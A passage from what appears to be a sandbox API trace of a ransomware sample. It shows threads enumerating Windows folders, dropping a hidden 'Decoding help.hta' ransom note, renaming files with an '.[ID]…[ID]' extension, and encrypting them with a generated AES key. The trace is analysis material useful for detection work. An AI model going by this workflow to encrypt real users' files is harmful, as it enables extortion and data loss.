nFileSizeHigh=0x0, nFileSizeLow=0xb8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="EDGE.ELM", cAlternateFileName="")) returned 1 Thread: id = 687 os_tid = 0xf04 [0054.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*.*", lpFindFileData=0x1865fd30 | out: lpFindFileData=0x1865fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42cf818 [0062.542] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.542] FindNextFileW (in: hFindFile=0x42cf818, lpFindFileData=0x1865fd30 | out: lpFindFileData=0x1865fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.543] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.543] FindNextFileW (in: hFindFile=0x42cf818, lpFindFileData=0x1865fd30 | out: lpFindFileData=0x1865fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc37d800, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x52008f10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc37d800, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x12dee, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVRGREEN.ELM", cAlternateFileName="")) returned 1 Thread: id = 688 os_tid = 0xf08 [0054.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x1921fd30 | out: lpFindFileData=0x1921fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2830 [0054.460] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.460] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1921fd30 | out: lpFindFileData=0x1921fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.460] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.460] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.460] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1921fd30 | out: lpFindFileData=0x1921fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532ebf00, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x532ebf00, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x532ebf00, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.460] lstrcpyW (in: lpString1=0x107f01e8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0054.460] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned 119 [0054.460] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" [0054.460] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\decoding help.hta")) returned 0xffffffff [0054.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb88 [0058.366] WriteFile (in: hFile=0xb88, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1921fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1921fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.367] CloseHandle (hObject=0xb88) returned 1 [0058.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.367] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.367] lstrlenW (lpString="cab1.cab") returned 8 [0058.367] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0058.367] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned 119 [0058.368] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0058.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0058.368] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.368] FindNextFileW (in: hFindFile=0x5e2830, lpFindFileData=0x1921fd30 | out: lpFindFileData=0x1921fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9b3800, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x4f9b3800, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x4f9b3800, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0058.368] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0058.368] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned 119 [0058.368] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" [0058.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\decoding help.hta")) returned 0x1 [0058.368] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeAdditional_x86.msi") returned -1 [0058.368] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0058.368] lstrcmpiW (lpString1="[ID]", lpString2=".msi") returned 1 [0058.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0058.368] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned 119 [0058.368] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="vc_runtimeAdditional_x86.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" [0058.368] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" [0058.368] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb88 [0058.369] CreateFileMappingA (hFile=0xb88, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb8c [0058.369] CryptAcquireContextA (in: phProv=0x1921fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1921fcec*=0x2aac5ab0) returned 1 [0060.206] CryptGenKey (in: hProv=0x2aac5ab0, Algid=0x6610, dwFlags=0x1, phKey=0x1921fce8 | out: phKey=0x1921fce8*=0x5fca460) returned 1 [0060.206] CryptExportKey (in: hKey=0x5fca460, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1921fbe4, pdwDataLen=0x1921fce4 | out: pbData=0x1921fbe4*, pdwDataLen=0x1921fce4*=0x2c) returned 1 [0060.206] MapViewOfFile (hFileMappingObject=0xb8c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23000) returned 0x39f0000 [0065.099] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1921fbe4*, pdwDataLen=0x1921fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1921fbe4*, pdwDataLen=0x1921fcf8*=0x100) returned 1 [0065.099] CryptEncrypt (hKey=0x5fca460, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39f0000, pdwDataLen=0x1921fce4*=0x23000, dwBufLen=0x23000) Thread: id = 689 os_tid = 0xf0c [0054.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*", lpFindFileData=0x195dfd30 | out: lpFindFileData=0x195dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2b70 [0054.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.464] FindNextFileW (in: hFindFile=0x5e2b70, lpFindFileData=0x195dfd30 | out: lpFindFileData=0x195dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.464] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.464] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.464] FindNextFileW (in: hFindFile=0x5e2b70, lpFindFileData=0x195dfd30 | out: lpFindFileData=0x195dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOSVINT.DLL", cAlternateFileName="")) returned 1 [0054.464] lstrcpyW (in: lpString1=0x107f81f0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*" [0054.464] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*") returned 71 [0054.464] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\Decoding help.hta" [0054.464] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\decoding help.hta")) returned 0xffffffff [0054.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x61c [0054.464] WriteFile (in: hFile=0x61c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x195dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x195dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.465] CloseHandle (hObject=0x61c) returned 1 [0058.356] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.356] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSOSVINT.DLL") returned -1 [0058.356] lstrlenW (lpString="MSOSVINT.DLL") returned 12 [0058.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*" [0058.356] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*") returned 71 [0058.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\", lpString2="MSOSVINT.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" [0058.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" [0058.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8d0 [0061.609] CreateFileMappingA (hFile=0x8d0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8c8 [0061.609] CryptAcquireContextA (phProv=0x195dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 690 os_tid = 0xf10 [0054.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*.*", lpFindFileData=0xf94fd30 | out: lpFindFileData=0xf94fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42cf198 [0062.542] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.542] FindNextFileW (in: hFindFile=0x42cf198, lpFindFileData=0xf94fd30 | out: lpFindFileData=0xf94fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, 